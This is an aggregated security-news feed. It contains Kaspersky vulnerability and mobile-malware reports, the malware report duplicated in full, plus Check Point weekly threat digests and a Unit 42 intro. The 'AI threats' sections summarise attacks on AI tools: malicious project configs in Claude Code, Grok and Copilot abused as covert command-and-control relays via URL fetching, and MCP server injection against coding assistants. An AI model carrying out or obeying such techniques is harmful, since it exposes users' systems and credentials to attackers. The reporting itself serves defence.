The year 2025 saw a surge in high-profile vulnerabilities, several of which were significant enough to earn a unique nickname. This was the case with CVE-2025-49844, also known as RediShell, which was unveiled during a hacking competition. This vulnerability is a use-after-free issue related to how the load command functions within Lua interpreter scripts. To execute the attack, an attacker needs to prepare a malicious script and load it into the interpreter.

As with any named vulnerability, RediShell was immediately weaponized by threat actors and spammers, albeit in a somewhat unconventional manner. Because technical details were initially scarce following its disclosure, the internet was flooded with fake PoC exploits and scanners claiming to test for the vulnerability. In the best-case scenario, these tools were non-functional; in the worst, they infected the system. Notably, these fraudulent projects were frequently generated using LLMs. They followed a standardized template and often cross-referenced source code from other identical fake repositories.

CVE-2025-24990: a vulnerability in the ltmdm64.sys driver

Driver vulnerabilities are often discovered in legitimate third-party applications that have been part of the official OS distribution for a long time. Thus, CVE-2025-24990 has existed within code shipped by Microsoft throughout nearly the entire history of Windows. The vulnerable driver has been shipped since at least Windows 7 as a third-party driver for Agere Modem. According to Microsoft, this driver is no longer supported and, following the discovery of the flaw, was removed from the OS distribution entirely.

The vulnerability itself is straightforward: insecure handling of IOCTL codes leading to a null pointer dereference. Successful exploitation can lead to arbitrary command execution or a system crash resulting in a blue screen of death (BSOD) on modern systems.

CVE-2025-59287: a vulnerability in Windows Server Update Services (WSUS)

CVE-2025-59287 represents a textbook case of insecure deserialization. Exploitation is possible without any form of authentication; due to its ease of use, this vulnerability rapidly gained traction among threat actors. Technical details and detection methodologies for our product suite have been covered in our previous advisories.

Conclusion and advice

In Q4 2025, the rate of vulnerability registration has shown no signs of slowing down. Consequently, consistent monitoring and the timely application of security patches have become more critical than ever. To ensure resilient defense, it is vital to regularly assess and remediate known vulnerabilities while implementing technology designed to mitigate the impact of potential exploits.

Continuous monitoring of infrastructure, including the network perimeter, allows for the timely identification of threats and prevents them from escalating. Effective security also demands tracking the current threat landscape and applying preventative measures to minimize risks associated with system flaws. Kaspersky Next serves as a reliable partner in this process, providing real-time identification and detailed mapping of vulnerabilities within the environment.

Securing the workplace remains a top priority. Protecting corporate devices requires the adoption of solutions capable of blocking malware and preventing it from spreading. Beyond basic measures, organizations should implement adaptive systems that allow for the rapid deployment of security updates and the automation of patch management workflows.

  •  

Mobile malware evolution in 2025

Starting from the third quarter of 2025, we have updated our statistical methodology based on the Kaspersky Security Network. These changes affect all sections of the report except for the installation package statistics, which remain unchanged.

To illustrate trends between reporting periods, we have recalculated the previous year’s data; consequently, these figures may differ significantly from previously published numbers. All subsequent reports will be generated using this new methodology, ensuring accurate data comparisons with the findings presented in this article.

Kaspersky Security Network (KSN) is a global network for analyzing anonymized threat intelligence, voluntarily shared by Kaspersky users. The statistics in this report are based on KSN data unless explicitly stated otherwise.

The year in figures

According to Kaspersky Security Network, in 2025:

  • Over 14 million attacks involving malware, adware or unwanted mobile software were blocked.
  • Adware remained the most prevalent mobile threat, accounting for 62% of all detections.
  • Over 815 thousand malicious installation packages were detected, including 255 thousand mobile banking Trojans.

The year’s highlights

In 2025, cybercriminals launched an average of approximately 1.17 million attacks per month against mobile devices using malicious, advertising, or unwanted software. In total, Kaspersky solutions blocked 14,059,465 attacks throughout the year.

Attacks on Kaspersky mobile users in 2025 (download)

Beyond the malware mentioned in previous quarterly reports, 2025 saw the discovery of several other notable Trojans. Among these, in Q4 we uncovered the Keenadu preinstalled backdoor. This malware is integrated into device firmware during the manufacturing stage. The malicious code is injected into libandroid_runtime.so – a core library for the Android Java runtime environment – allowing a copy of the backdoor to enter the address space of every app running on the device. Depending on the specific app, the malware can then perform actions such as inflating ad views, displaying banners on behalf of other apps, or hijacking search queries. The functionality of Keenadu is virtually unlimited, as its malicious modules are downloaded dynamically and can be updated remotely.

Cybersecurity researchers also identified the Kimwolf IoT botnet, which specifically targets Android TV boxes. Infected devices are capable of launching DDoS attacks, operating as reverse proxies, and executing malicious commands via a reverse shell. Subsequent analysis revealed that Kimwolf’s reverse proxy functionality was being leveraged by proxy providers to use compromised home devices as residential proxies.

Another notable discovery in 2025 was the LunaSpy Trojan.

LunaSpy Trojan, distributed under the guise of an antivirus app

LunaSpy Trojan, distributed under the guise of an antivirus app

Disguised as antivirus software, this spyware exfiltrates browser passwords, messaging app credentials, SMS messages, and call logs. Furthermore, it is capable of recording audio via the device’s microphone and capturing video through the camera. This threat primarily targeted users in Russia.

Mobile threat statistics

815,735 new unique installation packages were observed in 2025, showing a decrease compared to the previous year. While the decline in 2024 was less pronounced, this past year saw the figure drop by nearly one-third.

Detected Android-specific malware and unwanted software installation packages in 2022–2025 (download)

The overall decrease in detected packages is primarily due to a reduction in apps categorized as not-a-virus. Conversely, the number of Trojans has increased significantly, a trend clearly reflected in the distribution data below.

Detected packages by type

Distribution* of detected mobile software by type, 2024–2025 (download)

* The data for the previous year may differ from previously published data due to some verdicts being retrospectively revised.

A significant increase in Trojan-Banker and Trojan-Spy apps was accompanied by a decline in AdWare and RiskTool files. The most prevalent banking Trojans were Mamont (accounting for 49.8% of apps) and Creduz (22.5%). Leading the persistent adware category were MobiDash (39%), Adlo (27%), and HiddenAd (20%).

Share* of users attacked by each type of malware or unwanted software out of all users of Kaspersky mobile solutions attacked in 2024–2025 (download)

* The total may exceed 100% if the same users encountered multiple attack types.

Trojan-Banker malware saw a significant surge in 2025, not only in terms of unique file counts but also in the total number of attacks. Nevertheless, this category ranked fourth overall, trailing far behind the Trojan file category, which was dominated by various modifications of Triada and Fakemoney.

TOP 20 types of mobile malware

Note that the malware rankings below exclude riskware and potentially unwanted apps, such as RiskTool and adware.

Verdict % 2024* % 2025* Difference in p.p. Change in ranking
Trojan.AndroidOS.Triada.fe 0.04 9.84 +9.80
Trojan.AndroidOS.Triada.gn 2.94 8.14 +5.21 +6
Trojan.AndroidOS.Fakemoney.v 7.46 7.97 +0.51 +1
DangerousObject.Multi.Generic 7.73 5.83 –1.91 –2
Trojan.AndroidOS.Triada.ii 0.00 5.25 +5.25
Trojan-Banker.AndroidOS.Mamont.da 0.10 4.12 +4.02
Trojan.AndroidOS.Triada.ga 10.56 3.75 –6.81 –6
Trojan-Banker.AndroidOS.Mamont.db 0.01 3.53 +3.51
Backdoor.AndroidOS.Triada.z 0.00 2.79 +2.79
Trojan-Banker.AndroidOS.Coper.c 0.81 2.54 +1.72 +35
Trojan-Clicker.AndroidOS.Agent.bh 0.34 2.48 +2.14 +74
Trojan-Dropper.Linux.Agent.gen 1.82 2.37 +0.55 +4
Trojan.AndroidOS.Boogr.gsh 5.41 2.06 –3.35 –8
DangerousObject.AndroidOS.GenericML 2.42 1.97 –0.45 –3
Trojan.AndroidOS.Triada.gs 3.69 1.93 –1.76 –9
Trojan-Downloader.AndroidOS.Agent.no 0.00 1.87 +1.87
Trojan.AndroidOS.Triada.hf 0.00 1.75 +1.75
Trojan-Banker.AndroidOS.Mamont.bc 1.13 1.65 +0.51 +8
Trojan.AndroidOS.Generic. 2.13 1.47 –0.66 –6
Trojan.AndroidOS.Triada.hy 0.00 1.44 +1.44

* Unique users who encountered this malware as a percentage of all attacked users of Kaspersky mobile solutions.

The list is largely dominated by the Triada family, which is distributed via malicious modifications of popular messaging apps. Another infection vector involves tricking victims into installing an official messaging app within a “customized virtual environment” that supposedly offers enhanced configuration options. Fakemoney scam applications, which promise fraudulent investment opportunities or fake payouts, continue to target users frequently, ranking third in our statistics. Meanwhile, the Mamont banking Trojan variants occupy the 6th, 8th, and 18th positions by number of attacks. The Triada backdoor preinstalled in the firmware of certain devices reached the 9th spot.

Region-specific malware

This section describes malware families whose attack campaigns are concentrated within specific countries.

Verdict Country* %**
Trojan-Banker.AndroidOS.Coper.a Türkiye 95.74
Trojan-Dropper.AndroidOS.Hqwar.bj Türkiye 94.96
Trojan.AndroidOS.Thamera.bb India 94.71
Trojan-Proxy.AndroidOS.Agent.q Germany 93.70
Trojan-Banker.AndroidOS.Coper.c Türkiye 93.42
Trojan-Banker.AndroidOS.Rewardsteal.lv India 92.44
Trojan-Banker.AndroidOS.Rewardsteal.jp India 92.31
Trojan-Banker.AndroidOS.Rewardsteal.ib India 91.91
Trojan-Dropper.AndroidOS.Rewardsteal.h India 91.45
Trojan-Banker.AndroidOS.Rewardsteal.nk India 90.98
Trojan-Dropper.AndroidOS.Agent.sm Türkiye 90.34
Trojan-Dropper.AndroidOS.Rewardsteal.ac India 89.38
Trojan-Banker.AndroidOS.Rewardsteal.oa India 89.18
Trojan-Banker.AndroidOS.Rewardsteal.ma India 88.58
Trojan-Spy.AndroidOS.SmForw.ko India 88.48
Trojan-Dropper.AndroidOS.Pylcasa.c Brazil 88.25
Trojan-Dropper.AndroidOS.Hqwar.bf Türkiye 88.15
Trojan-Banker.AndroidOS.Agent.pp India 87.85

* Country where the malware was most active.
** Unique users who encountered the malware in the indicated country as a percentage of all users of Kaspersky mobile solutions who were attacked by the same malware.

Türkiye saw the highest concentration of attacks from Coper banking Trojans and their associated Hqwar droppers. In India, Rewardsteal Trojans continued to proliferate, exfiltrating victims’ payment data under the guise of monetary giveaways. Additionally, India saw a resurgence of the Thamera Trojan, which we previously observed frequently attacking users in 2023. This malware hijacks the victim’s device to illicitly register social media accounts.

The Trojan-Proxy.AndroidOS.Agent.q campaign, concentrated in Germany, utilized a compromised third-party application designed for tracking discounts at a major German retail chain. Attackers monetized these infections through unauthorized use of the victims’ devices as residential proxies.

In Brazil, 2025 saw a concentration of Pylcasa Trojan attacks. This malware is primarily used to redirect users to phishing pages or illicit online casino sites.

Mobile banking Trojans

The number of new banking Trojan installation packages surged to 255,090, representing a several-fold increase over previous years.

Mobile banking Trojan installation packages detected by Kaspersky in 2022–2025 (download)

Notably, the total number of attacks involving bankers grew by 1.5 times, maintaining the same growth rate seen in the previous year. Given the sharp spike in the number of unique malicious packages, we can conclude that these attacks yield significant profit for cybercriminals. This is further evidenced by the fact that threat actors continue to diversify their delivery channels and accelerate the production of new variants in an effort to evade detection by security solutions.

TOP 10 mobile bankers

Verdict % 2024* % 2025* Difference in p.p. Change in ranking
Trojan-Banker.AndroidOS.Mamont.da 0.86 15.65 +14.79 +28
Trojan-Banker.AndroidOS.Mamont.db 0.12 13.41 +13.29
Trojan-Banker.AndroidOS.Coper.c 7.19 9.65 +2.46 +2
Trojan-Banker.AndroidOS.Mamont.bc 10.03 6.26 –3.77 –3
Trojan-Banker.AndroidOS.Mamont.ev 0.00 4.10 +4.10
Trojan-Banker.AndroidOS.Coper.a 9.04 4.00 –5.04 –4
Trojan-Banker.AndroidOS.Mamont.ek 0.00 3.73 +3.73
Trojan-Banker.AndroidOS.Mamont.cb 0.64 3.04 +2.40 +26
Trojan-Banker.AndroidOS.Faketoken.pac 2.17 2.95 +0.77 +5
Trojan-Banker.AndroidOS.Mamont.hi 0.00 2.75 +2.75

* Unique users who encountered this malware as a percentage of all users of Kaspersky mobile solutions who encountered banking threats.

In 2025, we observed a massive surge in activity from Mamont banking Trojans. They accounted for approximately half of all new apps in their category and also were utilized in half of all banking Trojan attacks.

Conclusion

The year 2025 saw a continuing trend toward a decline in total unique unwanted software installation packages. However, we noted a significant year-over-year increase in specific threats – most notably mobile banking Trojans and spyware – even though adware remained the most frequently detected threat overall.

Among the mobile threats detected, we have seen an increased prevalence of preinstalled backdoors, such as Triada and Keenadu. Consistent with last year’s findings, certain mobile malware families continue to proliferate via official app stores. Finally, we have observed a growing interest among threat actors in leveraging compromised devices as proxies.

  •  

Mobile malware evolution in 2025

Starting from the third quarter of 2025, we have updated our statistical methodology based on the Kaspersky Security Network. These changes affect all sections of the report except for the installation package statistics, which remain unchanged.

To illustrate trends between reporting periods, we have recalculated the previous year’s data; consequently, these figures may differ significantly from previously published numbers. All subsequent reports will be generated using this new methodology, ensuring accurate data comparisons with the findings presented in this article.

Kaspersky Security Network (KSN) is a global network for analyzing anonymized threat intelligence, voluntarily shared by Kaspersky users. The statistics in this report are based on KSN data unless explicitly stated otherwise.

The year in figures

According to Kaspersky Security Network, in 2025:

  • Over 14 million attacks involving malware, adware or unwanted mobile software were blocked.
  • Adware remained the most prevalent mobile threat, accounting for 62% of all detections.
  • Over 815 thousand malicious installation packages were detected, including 255 thousand mobile banking Trojans.

The year’s highlights

In 2025, cybercriminals launched an average of approximately 1.17 million attacks per month against mobile devices using malicious, advertising, or unwanted software. In total, Kaspersky solutions blocked 14,059,465 attacks throughout the year.

Attacks on Kaspersky mobile users in 2025 (download)

Beyond the malware mentioned in previous quarterly reports, 2025 saw the discovery of several other notable Trojans. Among these, in Q4 we uncovered the Keenadu preinstalled backdoor. This malware is integrated into device firmware during the manufacturing stage. The malicious code is injected into libandroid_runtime.so – a core library for the Android Java runtime environment – allowing a copy of the backdoor to enter the address space of every app running on the device. Depending on the specific app, the malware can then perform actions such as inflating ad views, displaying banners on behalf of other apps, or hijacking search queries. The functionality of Keenadu is virtually unlimited, as its malicious modules are downloaded dynamically and can be updated remotely.

Cybersecurity researchers also identified the Kimwolf IoT botnet, which specifically targets Android TV boxes. Infected devices are capable of launching DDoS attacks, operating as reverse proxies, and executing malicious commands via a reverse shell. Subsequent analysis revealed that Kimwolf’s reverse proxy functionality was being leveraged by proxy providers to use compromised home devices as residential proxies.

Another notable discovery in 2025 was the LunaSpy Trojan.

LunaSpy Trojan, distributed under the guise of an antivirus app

LunaSpy Trojan, distributed under the guise of an antivirus app

Disguised as antivirus software, this spyware exfiltrates browser passwords, messaging app credentials, SMS messages, and call logs. Furthermore, it is capable of recording audio via the device’s microphone and capturing video through the camera. This threat primarily targeted users in Russia.

Mobile threat statistics

815,735 new unique installation packages were observed in 2025, showing a decrease compared to the previous year. While the decline in 2024 was less pronounced, this past year saw the figure drop by nearly one-third.

Detected Android-specific malware and unwanted software installation packages in 2022–2025 (download)

The overall decrease in detected packages is primarily due to a reduction in apps categorized as not-a-virus. Conversely, the number of Trojans has increased significantly, a trend clearly reflected in the distribution data below.

Detected packages by type

Distribution* of detected mobile software by type, 2024–2025 (download)

* The data for the previous year may differ from previously published data due to some verdicts being retrospectively revised.

A significant increase in Trojan-Banker and Trojan-Spy apps was accompanied by a decline in AdWare and RiskTool files. The most prevalent banking Trojans were Mamont (accounting for 49.8% of apps) and Creduz (22.5%). Leading the persistent adware category were MobiDash (39%), Adlo (27%), and HiddenAd (20%).

Share* of users attacked by each type of malware or unwanted software out of all users of Kaspersky mobile solutions attacked in 2024–2025 (download)

* The total may exceed 100% if the same users encountered multiple attack types.

Trojan-Banker malware saw a significant surge in 2025, not only in terms of unique file counts but also in the total number of attacks. Nevertheless, this category ranked fourth overall, trailing far behind the Trojan file category, which was dominated by various modifications of Triada and Fakemoney.

TOP 20 types of mobile malware

Note that the malware rankings below exclude riskware and potentially unwanted apps, such as RiskTool and adware.

Verdict % 2024* % 2025* Difference in p.p. Change in ranking
Trojan.AndroidOS.Triada.fe 0.04 9.84 +9.80
Trojan.AndroidOS.Triada.gn 2.94 8.14 +5.21 +6
Trojan.AndroidOS.Fakemoney.v 7.46 7.97 +0.51 +1
DangerousObject.Multi.Generic 7.73 5.83 –1.91 –2
Trojan.AndroidOS.Triada.ii 0.00 5.25 +5.25
Trojan-Banker.AndroidOS.Mamont.da 0.10 4.12 +4.02
Trojan.AndroidOS.Triada.ga 10.56 3.75 –6.81 –6
Trojan-Banker.AndroidOS.Mamont.db 0.01 3.53 +3.51
Backdoor.AndroidOS.Triada.z 0.00 2.79 +2.79
Trojan-Banker.AndroidOS.Coper.c 0.81 2.54 +1.72 +35
Trojan-Clicker.AndroidOS.Agent.bh 0.34 2.48 +2.14 +74
Trojan-Dropper.Linux.Agent.gen 1.82 2.37 +0.55 +4
Trojan.AndroidOS.Boogr.gsh 5.41 2.06 –3.35 –8
DangerousObject.AndroidOS.GenericML 2.42 1.97 –0.45 –3
Trojan.AndroidOS.Triada.gs 3.69 1.93 –1.76 –9
Trojan-Downloader.AndroidOS.Agent.no 0.00 1.87 +1.87
Trojan.AndroidOS.Triada.hf 0.00 1.75 +1.75
Trojan-Banker.AndroidOS.Mamont.bc 1.13 1.65 +0.51 +8
Trojan.AndroidOS.Generic. 2.13 1.47 –0.66 –6
Trojan.AndroidOS.Triada.hy 0.00 1.44 +1.44

* Unique users who encountered this malware as a percentage of all attacked users of Kaspersky mobile solutions.

The list is largely dominated by the Triada family, which is distributed via malicious modifications of popular messaging apps. Another infection vector involves tricking victims into installing an official messaging app within a “customized virtual environment” that supposedly offers enhanced configuration options. Fakemoney scam applications, which promise fraudulent investment opportunities or fake payouts, continue to target users frequently, ranking third in our statistics. Meanwhile, the Mamont banking Trojan variants occupy the 6th, 8th, and 18th positions by number of attacks. The Triada backdoor preinstalled in the firmware of certain devices reached the 9th spot.

Region-specific malware

This section describes malware families whose attack campaigns are concentrated within specific countries.

Verdict Country* %**
Trojan-Banker.AndroidOS.Coper.a Türkiye 95.74
Trojan-Dropper.AndroidOS.Hqwar.bj Türkiye 94.96
Trojan.AndroidOS.Thamera.bb India 94.71
Trojan-Proxy.AndroidOS.Agent.q Germany 93.70
Trojan-Banker.AndroidOS.Coper.c Türkiye 93.42
Trojan-Banker.AndroidOS.Rewardsteal.lv India 92.44
Trojan-Banker.AndroidOS.Rewardsteal.jp India 92.31
Trojan-Banker.AndroidOS.Rewardsteal.ib India 91.91
Trojan-Dropper.AndroidOS.Rewardsteal.h India 91.45
Trojan-Banker.AndroidOS.Rewardsteal.nk India 90.98
Trojan-Dropper.AndroidOS.Agent.sm Türkiye 90.34
Trojan-Dropper.AndroidOS.Rewardsteal.ac India 89.38
Trojan-Banker.AndroidOS.Rewardsteal.oa India 89.18
Trojan-Banker.AndroidOS.Rewardsteal.ma India 88.58
Trojan-Spy.AndroidOS.SmForw.ko India 88.48
Trojan-Dropper.AndroidOS.Pylcasa.c Brazil 88.25
Trojan-Dropper.AndroidOS.Hqwar.bf Türkiye 88.15
Trojan-Banker.AndroidOS.Agent.pp India 87.85

* Country where the malware was most active.
** Unique users who encountered the malware in the indicated country as a percentage of all users of Kaspersky mobile solutions who were attacked by the same malware.

Türkiye saw the highest concentration of attacks from Coper banking Trojans and their associated Hqwar droppers. In India, Rewardsteal Trojans continued to proliferate, exfiltrating victims’ payment data under the guise of monetary giveaways. Additionally, India saw a resurgence of the Thamera Trojan, which we previously observed frequently attacking users in 2023. This malware hijacks the victim’s device to illicitly register social media accounts.

The Trojan-Proxy.AndroidOS.Agent.q campaign, concentrated in Germany, utilized a compromised third-party application designed for tracking discounts at a major German retail chain. Attackers monetized these infections through unauthorized use of the victims’ devices as residential proxies.

In Brazil, 2025 saw a concentration of Pylcasa Trojan attacks. This malware is primarily used to redirect users to phishing pages or illicit online casino sites.

Mobile banking Trojans

The number of new banking Trojan installation packages surged to 255,090, representing a several-fold increase over previous years.

Mobile banking Trojan installation packages detected by Kaspersky in 2022–2025 (download)

Notably, the total number of attacks involving bankers grew by 1.5 times, maintaining the same growth rate seen in the previous year. Given the sharp spike in the number of unique malicious packages, we can conclude that these attacks yield significant profit for cybercriminals. This is further evidenced by the fact that threat actors continue to diversify their delivery channels and accelerate the production of new variants in an effort to evade detection by security solutions.

TOP 10 mobile bankers

Verdict % 2024* % 2025* Difference in p.p. Change in ranking
Trojan-Banker.AndroidOS.Mamont.da 0.86 15.65 +14.79 +28
Trojan-Banker.AndroidOS.Mamont.db 0.12 13.41 +13.29
Trojan-Banker.AndroidOS.Coper.c 7.19 9.65 +2.46 +2
Trojan-Banker.AndroidOS.Mamont.bc 10.03 6.26 –3.77 –3
Trojan-Banker.AndroidOS.Mamont.ev 0.00 4.10 +4.10
Trojan-Banker.AndroidOS.Coper.a 9.04 4.00 –5.04 –4
Trojan-Banker.AndroidOS.Mamont.ek 0.00 3.73 +3.73
Trojan-Banker.AndroidOS.Mamont.cb 0.64 3.04 +2.40 +26
Trojan-Banker.AndroidOS.Faketoken.pac 2.17 2.95 +0.77 +5
Trojan-Banker.AndroidOS.Mamont.hi 0.00 2.75 +2.75

* Unique users who encountered this malware as a percentage of all users of Kaspersky mobile solutions who encountered banking threats.

In 2025, we observed a massive surge in activity from Mamont banking Trojans. They accounted for approximately half of all new apps in their category and also were utilized in half of all banking Trojan attacks.

Conclusion

The year 2025 saw a continuing trend toward a decline in total unique unwanted software installation packages. However, we noted a significant year-over-year increase in specific threats – most notably mobile banking Trojans and spyware – even though adware remained the most frequently detected threat overall.

Among the mobile threats detected, we have seen an increased prevalence of preinstalled backdoors, such as Triada and Keenadu. Consistent with last year’s findings, certain mobile malware families continue to proliferate via official app stores. Finally, we have observed a growing interest among threat actors in leveraging compromised devices as proxies.

  •  

2nd March – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 2nd March, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Wynn Resorts, a United States-based casino and hotel operator, has confirmed that employee data was accessed following an extortion threat linked to ShinyHunters. The company said operations were not disrupted. Reports indicate the stolen dataset includes HR-related information, including contact details and employment records for current and former staff.
  • UFP Technologies, a United States-based medical device manufacturing giant, has disclosed a cyberattack that compromised parts of its IT environment and resulted in data exfiltration. The company reported disruptions to shipping and labeling workflows. According to the company, some of its data was wiped in the attack.
  • Transport Workers Union of America Local 100, which represents New York City transit workers, was targeted by the Qilin ransomware group and listed on its leak site. According to reports, personal data of the union’s 67,000 members is now at risk of fraud and identity misuse.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Wins.Qilin.ta.* Ransomware.Wins.Qilin.)

  • European home improvement marketplace ManoMano has reported a data breach tied to a third-party customer support portal. The exposed records include customer names, email addresses, phone numbers, and support ticket details. ManoMano said passwords and payment data were not affected, and notifications are being sent to impacted users.

AI THREATS

  • Check Point Research has discovered critical vulnerabilities in Anthropic’s Claude Code that allow attackers to achieve remote code execution and steal API credentials through malicious project configurations. Stolen keys can provide access to shared Workspaces for file access and tampering. Anthropic patched the issues, including CVE-2025-59536.
  • Anthropic warns of coordinated “distillation” activity attributed to China-based AI firms, including DeepSeek, MiniMax, and Moonshot. Anthropic said fraudulent accounts generated millions of Claude exchanges aimed at extracting reasoning, coding, and agent workflows. The activity was described as an effort to train competing models.
  • OpenAI has released a report listing malicious attempts to misuse its models. Among the threats listed in the report is an influence operation attempt linked to Chinese law enforcement, which targeted Japan’s prime minister.

VULNERABILITIES AND PATCHES

  • Two Roundcube Webmail flaws have been listed as exploited in the wild, including CVE-2025-49113, a high-severity post-auth remote code execution bug. The second issue, CVE-2025-68461, is an unauthenticated cross-site scripting flaw. The bugs affect widely used Roundcube deployments, including cPanel environments globally.

Check Point IPS provides protection against this threat (Roundcube Webmail Remote Code Execution (CVE-2025-49113))

  • Researchers have unveiled a pre-auth remote code execution chain in SolarWinds Web Help Desk. The chain combines authentication bypass flaws CVE-2025-40552 and CVE-2025-40554 with deserialization RCE CVE-2025-40553. A successful attack can allow takeover of exposed help desk servers without credentials. The flaws affect widely deployed on-premises instances.

Check Point IPS provides protection against these threats (SolarWinds Web Help Desk Authentication Bypass (CVE-2025-40536, CVE-2025-40554, CVE-2025-40552), SolarWinds Web Help Desk Insecure Deserialization (CVE-2024-28986, CVE-2024-28988, CVE-2025-40553, CVE-2025-26399))

  • Researchers alerted organizations about CVE-2026-20127, a critical authentication bypass in Cisco Catalyst SD-WAN Controller (CVSS 10) exploited in the wild for at least three years. Attackers can log in with high privileges, add rogue peers, and downgrade controllers to exploit CVE-2022-20775 for root access. CISA issued an emergency directive mandating fast patching.

THREAT INTELLIGENCE REPORTS

  • Check Point Research summarizes five key Iranian threat actor clusters relevant to the current conflict in the Middle East. It outlines the main TTPs these groups have recently used against targets in the Middle East and the United States and shares six defensive measures IT teams should take to help prevent attacks during the ongoing conflict.
  • Check Point Research has published its Untold Stories of 2025, a compilation covering multiple notable campaigns that occurred during 2025. These include exploitation of Microsoft SharePoint (“ToolShell”), and adversary-in-the-middle phishing used to bypass MFA, as well as state-linked operations attributed to groups such as Camaro Dragon and COLDRIVER. The report also highlights evolving command-and-control techniques observed across Europe and Central Asia.
  • Lazarus-linked operators were observed using Medusa ransomware in recent intrusions, including activity against a Middle Eastern entity and attempted access at a US healthcare organization. Medusa is described as a ransomware-as-a-service operation with leak-site activity.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat.

  • Researchers have uncovered GrayCharlie activity targeting WordPress sites by injecting external JavaScript that profiles visitors and delivers malware through fake updates or ClickFix-style prompts. Reporting links infections to NetSupport tooling, followed by Stealc and SectopRAT.

The post 2nd March – Threat Intelligence Report appeared first on Check Point Research.

  •  

23rd February – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 23rd February, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • France’s Ministry of Economy has disclosed a data breach resulted from an unauthorized access to the national bank account registry FICOBA, impacting information tied to 1.2 million accounts. Exposed data includes names, addresses, account identifiers and, in some cases, tax-related identifiers. Officials said the intrusion involved compromised government credentials.
  • Japanese tech giant Advantest Corporation was hit by a ransomware attack that resulted in the deployment of ransomware within portions of its network following unauthorized access by a third party on February 15. The incident may have impacted certain internal systems, and the potential compromise of customer or employee data remains unclear.
  • University of Mississippi Medical Center, an academic healthcare system in Mississippi, has suffered a ransomware attack that forced closures across its clinic network and disrupted access to electronic medical records. The organization canceled elective procedures and shifted to manual processes. Systems were taken offline and no ransomware group claimed responsibility.
  • Ukraine’s central bank, the National Bank of Ukraine (NBU), has faced a supply-chain incident affecting a contractor that runs its collectible coin online store. Exposed information includes customer registration data, such as names, emails, phone numbers, and delivery addresses. The bank indicated that payment information was not affected.

AI THREATS

  • Check Point Research unveiled a technique that repurposes AI assistants like Grok and Microsoft Copilot as covert C2 proxies by abusing web-browsing URL fetch features without authentication. Malware exfiltrates host data via query parameters and retrieves commands from AI-generated summaries through hidden WebView2, bypassing inspection of AI traffic.
  • A Russian-speaking financially motivated threat actor leveraged commercial generative AI tools to conduct mass credential abuse of 600 FortiGate devices in 55 countries from January 11 to February 18, 2026. The attackers targeted Veeam servers, exploiting CVE-2023-27532 and CVE-2024-40711.

Check Point IPS provides protection against this threat (Veeam Backup and Replication Insecure Deserialization (CVE-2024-40711))

  • Researchers uncovered a Shai-Hulud-like npm supply chain worm spreading via typosquatted packages, stealing developer and CI secrets, exfiltrating via GitHub API with DNS fallback, and propagating by poisoning workflows and git hooks, with MCP server injection targeting AI coding assistants and harvesting LLM API keys.

VULNERABILITIES AND PATCHES

  • Dell RecoverPoint for VMs, impacted by CVE-2026-22769 (CVSS 10.0) in versions before 6.0.3.1, has been exploited as a zero-day since mid-2024 by suspected Chinese group UNC6201. Attackers used hardcoded Tomcat credentials for unauthenticated root access, deploying SLAYSTYLE, BRICKSTORM, and the GRIMBOLT backdoor, and creating Ghost NICs to pivot and persist in VMware environments.

Check Point IPS and Threat Emulation provide protection against this threat (Dell RecoverPoint For Virtual Machines Arbitrary File Upload (CVE-2026-22769); Trojan.Wins.SLAYSTYLE; Trojan.Wins.BRICKSTORM.ta.*; Trojan.Wins.GRIMBOLT)

  • Grandstream GXP1600 series VoIP phones are affected by CVE-2026-2329, a critical unauthenticated stack-based buffer overflow in the web API allowing root RCE. Exploitation enables credential theft, SIP proxy reconfiguration, and covert call interception. Firmware version 1.0.7.81 fixes the issue.

Check Point IPS provides protection against this threat (Grandstream GXP1600 Stack Overflow (CVE-2026-2329))

  • A flaw in Microsoft 365 Copilot allows the “Work Tab” Chat feature to summarize emails protected by confidentiality sensitivity labels, bypassing configured Data Loss Prevention (DLP) policies. The code-level defect enables Copilot to access labeled content in Sent Items and Draft folders, exposing restricted data in AI-generated summaries.
  • Google has patched CVE-2026-2441, a high-severity Chrome zero-day in the CSS component in Google Chrome prior to 145.0.7632.75, confirmed exploited in the wild. The use-after-free flaw can enable remote code execution within the browser sandbox via a crafted page.

Check Point IPS provides protection against this threat (Google Chrome Use After Free (CVE-2026-2441))

THREAT INTELLIGENCE REPORTS

  • Researchers have discovered Keenadu, an Android firmware backdoor delivered via supply chain compromise. It uses RC4-encrypted payloads, DexClassLoader, and permission bypass frameworks for ad fraud, search hijacking, and monetization, with links to Triada and BADBOX.
  • Researchers analyzed Arkanix Stealer, a MaaS infostealer with Python and C++ implants, dynamic server side configuration, and modules including ChromElevator and HVNC. It uses phishing lures, steals from 22 browsers, Telegram and Discord and targets VPN, gaming and crypto wallets.
  • Researchers have analyzed a spam campaign that abused Atlassian Jira Cloud notifications to bypass email filters by exploiting trusted atlassian.net sender domains with valid SPF and DKIM authentication. The attackers rapidly spun up trial instances and used Jira Automation alongside the Keitaro TDS to distribute localized lures targeting government and corporate sectors.
  • Researchers identified a Booking.com-themed phishing campaign active since January 2026 that targets hotel partners and guests with a three-stage chain. It leveraged look-alike domains and IDN homographs, collected visitor fingerprinting with decoy pages, conducted partner account takeovers, and used WhatsApp lures to fake payment portals behind Cloudflare CAPTCHA.

The post 23rd February – Threat Intelligence Report appeared first on Check Point Research.

  •  

2026 Unit 42 Global Incident Response Report — Attacks Now 4x Faster

AI-Accelerated Attacks, Identity-Enabled Breaches and Expanding Software Supply Chain Exposure Define the 2026 Cyberthreat Landscape

Each year, thousands of organizations experience a cyber incident. An incident can begin with a SOC alert, zero-day vulnerability, ransom demand or widespread business disruption. When the call comes, our global incident responders quickly mobilize to investigate, contain and eradicate the threat.

This year’s Unit 42® 2026 Global Incident Response Report analyzed over 750 major cyber incidents across every major industry in over 50 countries to reveal emerging patterns and lessons for defenders.

The data shows a clear shift in how attacks unfold. Threat actors are moving faster, increasingly leveraging identity and trusted connections, and expanding attacks across multiple attack surfaces. The accelerating speed, scale and complexity of these intrusions mean the window between initial access and business impact is shrinking. Most breaches, however, still succeed due to preventable gaps in visibility and security controls.

Key Findings Show Attacks Are Faster, Broader and Harder to Contain

As adversaries adapt their playbooks, the report highlights several defining trends shaping the 2026 threat landscape:

